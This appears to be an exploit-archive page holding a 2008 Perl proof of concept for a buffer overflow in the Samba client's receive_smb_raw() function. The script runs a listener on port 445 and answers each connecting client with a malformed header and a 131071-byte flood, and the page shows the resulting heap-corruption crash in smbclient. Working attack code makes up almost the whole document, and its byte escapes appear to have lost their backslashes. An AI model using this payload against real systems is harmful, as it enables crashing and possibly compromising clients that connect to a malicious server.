[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC
# Published : 2008-06-01
# Author : Guido Landi
# Previous Title : MDaemon <= 9.6.5 Multiple Remote Buffer Overflow Exploit PoC
# Next Title : SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC
#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);
while(my $csock = $sock->accept())
{
print $csock "x00" .
"x01xffxff" .
"x41" x 131071;
}
# www.Syue.com [2008-06-01]